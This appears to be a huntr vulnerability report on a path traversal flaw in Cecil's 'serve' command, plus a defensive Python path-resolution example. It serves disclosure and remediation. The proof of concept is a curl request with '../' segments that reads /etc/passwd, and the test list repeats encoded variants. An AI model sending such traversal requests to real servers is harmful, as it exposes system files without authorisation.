Relative Path Traversal vulnerability in the serve command

huntr report CDD995B2-C983-428B-A73A-827B61B7C06B
Reported by ouuan on 2023-09-07 12:53:49 (www.huntr.dev)
Tags: cecil, path traversal, vulnerability, proof of concept, bug bounty

EPSS: 0.001 (Low), percentile 37.0%

Description

When a Cecil site is served with cecil serve, relative path traversal is possible via the path component of the request URI: ".." segments in the requested path are not confined to the site's output directory, so files outside it can be read.

Proof of Concept

Run the following commands:

mkdir cecil-path-traversal-poc
cd cecil-path-traversal-poc
curl -L https://cecil.app/cecil.phar -o cecil
chmod +x cecil
./cecil new:site -n
./cecil serve

Then run: curl --path-as-is http://localhost:8000/../../../../../../../../etc/passwd
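As an added illustration of the fix a development file server needs (this is example code written for this page, not Cecil's own implementation), the function below canonicalises the requested path against the document root and refuses anything that resolves outside it. The document root "/srv/site" and the sample request URIs are constructed for the demonstration.

```python
from pathlib import Path
from urllib.parse import unquote, urlsplit


def resolve_request_path(doc_root: str, uri: str):
    """Map a request URI onto a file below doc_root.

    Returns the canonical Path on success, or None when the request would
    escape the document root (path traversal). doc_root and uri are
    assumptions for this example; nothing here comes from Cecil.
    """
    root = Path(doc_root).resolve()
    # Keep only the path component, then percent-decode it once so that
    # encoded dot segments such as %2e%2e are treated like a literal "..".
    raw_path = unquote(urlsplit(uri).path)
    # Join and canonicalise: resolve() collapses "." and ".." and follows
    # symlinks, so the comparison below is made on the real filesystem path.
    candidate = (root / raw_path.lstrip("/")).resolve()
    # The canonical path must still lie inside the document root.
    try:
        candidate.relative_to(root)
    except ValueError:
        return None
    return candidate


def check_requests(doc_root: str, uris):
    """Return {uri: allowed} for a batch of request URIs (True = served)."""
    return {u: resolve_request_path(doc_root, u) is not None for u in uris}


if __name__ == "__main__":
    # Constructed sample requests: one legitimate, the rest traversal attempts.
    sample_uris = [
        "/index.html",
        "/blog/../index.html",
        "/../../../../../../../../etc/passwd",
        "/..%2f..%2fetc/passwd",
        "/%2e%2e/%2e%2e/etc/passwd",
    ]
    for uri, allowed in check_requests("/srv/site", sample_uris).items():
        print(f"{'serve ' if allowed else 'reject'}  {uri}")
```

Double-encoded segments ("%252e%252e") are deliberately decoded only once and therefore stay inside the root as an oddly named file, which is the correct outcome. Because resolve() follows symlinks, a symlink inside the document root that points elsewhere is also rejected; relax that only if the server is meant to publish linked content.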
